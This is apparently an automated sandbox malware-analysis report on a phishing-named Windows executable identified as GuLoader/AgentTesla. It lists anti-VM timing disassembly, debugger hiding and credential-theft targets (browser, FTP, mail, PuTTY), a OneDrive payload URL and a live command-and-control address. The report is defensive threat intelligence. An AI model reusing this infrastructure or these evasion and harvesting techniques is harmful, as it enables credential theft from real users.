Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000001.00000002.604141789.0000000003D50000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000001.00000002.604141789.0000000003D50000.00000004.00000001.sdmp, KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1025972369.00000000006B0000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1025972369.00000000006B0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=HTTPS://ONEDRIVE.LIVE.COM/DOWNLOAD?CID=7B0580AA0B18AE44&RESID=7B0580AA0B18AE44%21106&AUTHKEY=ANQAOZGBUZCFLEEWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	RDTSC instruction interceptor: First address: 0000000003D19586 second address: 0000000003D19586 instructions:
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	RDTSC instruction interceptor: First address: 0000000003D1B185 second address: 0000000003D1B185 instructions:
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	RDTSC instruction interceptor: First address: 0000000003D1A36A second address: 0000000003D1A381 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b xor edi, ED27E950h 0x00000011 pushad 0x00000012 mov eax, 000000C6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	RDTSC instruction interceptor: First address: 0000000003D162DB second address: 0000000003D162DB instructions:
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	RDTSC instruction interceptor: First address: 0000000003D1A3AE second address: 0000000003D1A247 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov dword ptr [ebp+000001A5h], edx 0x00000010 cmp cx, ax 0x00000013 mov edx, F94DAB62h 0x00000018 xor edx, BD1A4B48h 0x0000001e xor edx, C6B15F47h 0x00000024 jmp 00007F0E0CF3DE02h 0x00000026 cmp si, 0F1Bh 0x0000002b sub edx, 82E5DE6Eh 0x00000031 cmp ah, bh 0x00000033 cmp word ptr [ebx+05h], dx 0x00000037 mov edx, dword ptr [ebp+000001A5h] 0x0000003d jne 00007F0E0CF3DDDCh 0x0000003f mov dword ptr [ebp+00000189h], ecx 0x00000045 mov ecx, CF26FC6Ch 0x0000004a xor ecx, 90037EF2h 0x00000050 test ax, dx 0x00000053 add ecx, B269DCB6h 0x00000059 cmp cl, al 0x0000005b add ecx, EE70C0ACh 0x00000061 nop 0x00000062 cmp dword ptr [ebp+00000189h], ecx 0x00000068 mov ecx, dword ptr [ebp+00000189h] 0x0000006e jne 00007F0E0CF3DA34h 0x00000074 inc ecx 0x00000075 inc ebx 0x00000076 mov dword ptr [ebp+0000017Dh], ecx 0x0000007c mov ecx, 3E44CBEFh 0x00000081 xor ecx, B436F885h 0x00000087 add ecx, 0943E9D7h 0x0000008d xor ecx, 0326DE11h 0x00000093 test bl, FFFFFFE4h 0x00000096 cmp dword ptr [ebx], ecx 0x00000098 mov ecx, dword ptr [ebp+0000017Dh] 0x0000009e jne 00007F0E0CF3DE36h 0x000000a4 mov dword ptr [ebp+00000171h], edi 0x000000aa mov edi, dword ptr [ebx] 0x000000ac cmp edx, edi 0x000000ae mov edi, dword ptr [ebp+00000171h] 0x000000b4 jne 00007F0E0CF3DDB8h 0x000000b6 mov dword ptr [ebp+0000022Eh], eax 0x000000bc test ax, cx 0x000000bf mov eax, 90506750h 0x000000c4 test bx, bx 0x000000c7 pushad 0x000000c8 lfence 0x000000cb rdtsc
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	RDTSC instruction interceptor: First address: 0000000003D15953 second address: 0000000003D15953 instructions:
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	RDTSC instruction interceptor: First address: 000000000056A36A second address: 000000000056A381 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b xor edi, ED27E950h 0x00000011 pushad 0x00000012 mov eax, 000000C6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	RDTSC instruction interceptor: First address: 000000000056392D second address: 000000000056392D instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp dx, bx 0x0000000d sub ecx, 45FB412Ah 0x00000013 cmp dword ptr [ebp+00000248h], ecx 0x00000019 mov ecx, dword ptr [ebp+00000248h] 0x0000001f jne 00007F0E0CA150EFh 0x00000021 mov byte ptr [eax+ecx-01h], FFFFFF9Ch 0x00000026 xor byte ptr [eax+ecx-01h], FFFFFFBEh 0x0000002b xor byte ptr [eax+ecx-01h], FFFFFFEAh 0x00000030 test ebx, eax 0x00000032 xor byte ptr [eax+ecx-01h], FFFFFFC8h 0x00000037 dec ecx 0x00000038 mov dword ptr [ebp+00000248h], ecx 0x0000003e test dl, 00000057h 0x00000041 mov ecx, B206E4FAh 0x00000046 add ecx, 638A09D6h 0x0000004c xor ecx, 506BAFFAh 0x00000052 pushad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	RDTSC instruction interceptor: First address: 00000000005642E1 second address: 00000000005642E1 instructions:

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe

Code function: 1_2_03D1611B rdtsc

1_2_03D1611B

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe TID: 6988	Thread sleep count: 205 > 30			Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe TID: 7032	Thread sleep time: -60000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000001.00000002.604141789.0000000003D50000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000001.00000002.604141789.0000000003D50000.00000004.00000001.sdmp, KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1025972369.00000000006B0000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1025972369.00000000006B0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=https://onedrive.live.com/download?cid=7B0580AA0B18AE44&resid=7B0580AA0B18AE44%21106&authkey=ANqAOzgBuZcfleEwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe

Code function: 1_2_03D1611B rdtsc

1_2_03D1611B

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe

Code function: 1_2_03D17601 LdrInitializeThunk,

1_2_03D17601

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D19D8D mov eax, dword ptr fs:[00000030h]	1_2_03D19D8D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D18769 mov eax, dword ptr fs:[00000030h]	1_2_03D18769
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D19D39 mov eax, dword ptr fs:[00000030h]	1_2_03D19D39
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D140DC mov eax, dword ptr fs:[00000030h]	1_2_03D140DC
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D16245 mov eax, dword ptr fs:[00000030h]	1_2_03D16245
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1347D mov eax, dword ptr fs:[00000030h]	1_2_03D1347D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D18E26 mov eax, dword ptr fs:[00000030h]	1_2_03D18E26

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe

Process created: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe 'C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe'

Jump to behavior

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection11	Masquerading1	OS Credential Dumping2	Security Software Discovery621	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion221	Input Capture11	Virtualization/Sandbox Evasion221	Remote Desktop Protocol	Input Capture11	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection11	Credentials in Registry1	Remote System Discovery1	SMB/Windows Admin Shares	Archive Collected Data1	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	File and Directory Discovery1	Distributed Component Object Model	Data from Local System2	Scheduled Transfer	Application Layer Protocol113	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	System Information Discovery34	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
KHAWATMI CO.IMPORT & EXPORT.exe	13%	ReversingLabs	Win32.Trojan.AgentTesla

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://185.227.139.18/dsaicosaicasdi.php/a1NQk98eWCWX2	0%	Avira URL Cloud	safe
http://crl.microsoft	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mbdetq.dm.files.1drv.com	unknown	unknown	false		high
onedrive.live.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.227.139.18/dsaicosaicasdi.php/a1NQk98eWCWX2	false	Avira URL Cloud: safe	unknown
https://onedrive.live.com/download?cid=7B0580AA0B18AE	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://onedrive.live.com/download?cid=7B0580AA0B18AE44&resid=7B0580AA0B18AE44%21106&authkey=ANqAOzg	KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1025972369.00000000006B0000.00000004.00000001.sdmp	false		high
http://crl.microsoft	KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1029956322.000000001E2A6000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.227.139.18	unknown	Iran (ISLAMIC Republic Of)		48011	DIGITURUNCTR	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	458277
Start date:	03.08.2021
Start time:	08:05:18
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	KHAWATMI CO.IMPORT & EXPORT.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Suspected Instruction Hammering Hide Perf
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/2@2/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 2.2% (good quality ratio 0.2%) Quality average: 1.5% Quality standard deviation: 4.5%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.88.21.125, 104.43.139.144, 20.82.210.154, 23.211.4.86, 20.54.110.249, 40.112.88.60, 80.67.82.211, 80.67.82.235, 40.126.31.135, 20.190.159.134, 40.126.31.139, 40.126.31.8, 20.190.159.132, 40.126.31.1, 40.126.31.6, 20.190.159.138, 51.11.168.232, 13.107.42.13, 13.107.42.12, 20.50.102.62 Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, odc-dm-files-geo.onedrive.akadns.net, www.tm.lg.prod.aadmsa.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, l-0004.l-msedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, odc-dm-files-brs.onedrive.akadns.net, fs.microsoft.com, odc-web-geo.onedrive.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, skypedataprdcolcus16.cloudapp.net, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, dm-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/458277/sample/KHAWATMI CO.IMPORT & EXPORT.exe

Simulations

Behavior and APIs

Time	Type	Description
08:12:29	API Interceptor	1x Sleep call for process: KHAWATMI CO.IMPORT & EXPORT.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.227.139.18	RQF00432117.exe	Get hash	malicious	Browse	185.227.139.18/dsaicosaicasdi.php/BEF2P6YRqV1nZ
	ikenna.exe	Get hash	malicious	Browse	185.227.139.18/dsaicosaicasdi.php/rr9an1w9Exqdo
	Purchase Order No#76480023.exe	Get hash	malicious	Browse	185.227.139.18/dsaicosaicasdi.php/IDEUeAngcojy8
	rjHOcnLYGHZCy5f.exe	Get hash	malicious	Browse	185.227.139.18/dsaicosaicasdi.php/rD5fy9Ok7coFb
	jdik4JxEILyMsaJ.exe	Get hash	malicious	Browse	185.227.139.18/dsaicosaicasdi.php/W9ZqiawWCXST6
	BC 1.1 ASTRA JUOKU.pdf.exe	Get hash	malicious	Browse	185.227.139.18/dsaicosaicasdi.php/yfNQXpqQZjJcw
	DHL Shipment Detailspdf.exe	Get hash	malicious	Browse	185.227.139.18/dsaicosaicasdi.php/rD5fy9Ok7coFb
	1SUxqGW4Vk.exe	Get hash	malicious	Browse	185.227.139.18/dsaicosaicasdi.php/jRbn3g7uWVTsx
	swift.xlsx	Get hash	malicious	Browse	185.227.139.18/dsaicosaicasdi.php/jRbn3g7uWVTsx
	EshGqi8G0p.exe	Get hash	malicious	Browse	185.227.139.18/dsaicosaicasdi.php/o6INQXqciSF92
	RFQ file_pdf.gz.exe	Get hash	malicious	Browse	185.227.139.18/dsaicosaicasdi.php/rVXhi7NTm83H7
	oidItpvxvp.exe	Get hash	malicious	Browse	185.227.139.18/dsaicosaicasdi.php/jRbn3g7uWVTsx
	Advance Payment and shedule update.xlsx	Get hash	malicious	Browse	185.227.139.18/dsaicosaicasdi.php/jRbn3g7uWVTsx
	Documents.exe	Get hash	malicious	Browse	185.227.139.18/dsaicosaicasdi.php/fw2pM7fnRpMCI
	d3mSX5c3S5.exe	Get hash	malicious	Browse	185.227.139.18/dsaicosaicasdi.php/jRbn3g7uWVTsx
	gunzipped.exe	Get hash	malicious	Browse	185.227.139.18/dsaicosaicasdi.php/6mr5C1QFWrZ4O
	invoice.xlsx	Get hash	malicious	Browse	185.227.139.18/dsaicosaicasdi.php/jRbn3g7uWVTsx
	yGeKxvNPm4.exe	Get hash	malicious	Browse	185.227.139.18/dsaicosaicasdi.php/NHNmTUOdS6fzz
	C1nbP5vVzw.exe	Get hash	malicious	Browse	185.227.139.18/dsaicosaicasdi.php/NHNmTUOdS6fzz
	rYUbPNiimt.exe	Get hash	malicious	Browse	185.227.139.18/dsaicosaicasdi.php/jRbn3g7uWVTsx

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DIGITURUNCTR	RQF00432117.exe	Get hash	malicious	Browse	185.227.139.18
	ikenna.exe	Get hash	malicious	Browse	185.227.139.18
	Purchase Order No#76480023.exe	Get hash	malicious	Browse	185.227.139.18
	rjHOcnLYGHZCy5f.exe	Get hash	malicious	Browse	185.227.139.18
	jdik4JxEILyMsaJ.exe	Get hash	malicious	Browse	185.227.139.18
	BC 1.1 ASTRA JUOKU.pdf.exe	Get hash	malicious	Browse	185.227.139.18
	DHL Shipment Detailspdf.exe	Get hash	malicious	Browse	185.227.139.18
	1SUxqGW4Vk.exe	Get hash	malicious	Browse	185.227.139.18
	swift.xlsx	Get hash	malicious	Browse	185.227.139.18
	EshGqi8G0p.exe	Get hash	malicious	Browse	185.227.139.18
	RFQ file_pdf.gz.exe	Get hash	malicious	Browse	185.227.139.18
	oidItpvxvp.exe	Get hash	malicious	Browse	185.227.139.18
	Advance Payment and shedule update.xlsx	Get hash	malicious	Browse	185.227.139.18
	Documents.exe	Get hash	malicious	Browse	185.227.139.18
	d3mSX5c3S5.exe	Get hash	malicious	Browse	185.227.139.18
	gunzipped.exe	Get hash	malicious	Browse	185.227.139.18
	invoice.xlsx	Get hash	malicious	Browse	185.227.139.18
	yGeKxvNPm4.exe	Get hash	malicious	Browse	185.227.139.18
	C1nbP5vVzw.exe	Get hash	malicious	Browse	185.227.139.18
	rYUbPNiimt.exe	Get hash	malicious	Browse	185.227.139.18

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck Download File
Process:	C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a Download File
Process:	C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe
File Type:	data
Category:	dropped
Size (bytes):	598
Entropy (8bit):	0.6390116820665388
Encrypted:	false
SSDEEP:	3:/lbOllbOllbOllbOllbOllbOllbON:+
MD5:	E306B2B657314B7CA1B899F1A8B2A979
SHA1:	DDF029D39D1A076A4218049CBD5143EE64A0D13B
SHA-256:	A3284A821DC0F8281285B68E3F1F2712F6D5B97E605233AC91235F780D55DCE4
SHA-512:	EF935FBEDB6A39D819F650912E4E72355A6B395B01D15DE89CB30045A7330936CC1964C3CA771F8A9327043D734D5CD252DD91DE858A28E97283E310A988E41B
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.387725511048366
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	KHAWATMI CO.IMPORT & EXPORT.exe
File size:	147456
MD5:	0153ae8cf4b1f546721332b5cb3f973c
SHA1:	479858ef740172cb3791527a9c9d0da76eec3af4
SHA256:	97fee7e2c533d7ad3854cd92d9d2dbcddeb3b08e3e0cb14214b431d3970cda45
SHA512:	1a6ae92b4937ea140069189487e669377f8a59ceffa29597f18c94d83646184344f4ba4d0fe42ce5153d95791ad31b3fe8b715b6a55fe3b923ce59fd4201bac1
SSDEEP:	1536:EtVr5LC183SqwDIse4yckz/50ZG8tnSSyeMn5iXDjTf8+Oh1K:E/5CIRwDdeZcFYeMn5iXDj5Oh1K
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L...#..V.....................0............... ....@................

File Icon


Icon Hash:	c4e8c8cccce0e8e8

Static PE Info

General
Entrypoint:	0x4014b4
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x56A2ED23 [Sat Jan 23 03:01:55 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	fef384fc3a66a559dff455f07d497ca0

Entrypoint Preview

Instruction
push 00401EBCh
call 00007F0E0C9517B3h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebp+39C0B02Ah], al
xor dword ptr [eax-2DAA55BCh], 16h
adc byte ptr [bx+si-62h], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
inc ecx
add byte ptr [eax], ah
or byte ptr [ecx+00h], al
inc esp
inc ebp
dec ebp
dec ecx
dec esi
inc ebp
push edx
inc ecx
dec esp
dec ecx
push ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
add byte ptr [eax+72h], al
js 00007F0E0C951825h
call far 0055h : 914061FDh
jl 00007F0E0C95180Bh
inc esp
inc esp
inc eax
daa
adc ch, bh
jbe 00007F0E0C951760h
shr byte ptr [edi-7B6F79B1h], FFFFFFFBh
enter 9718h, 57h
cmp cl, byte ptr [edi-53h]
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
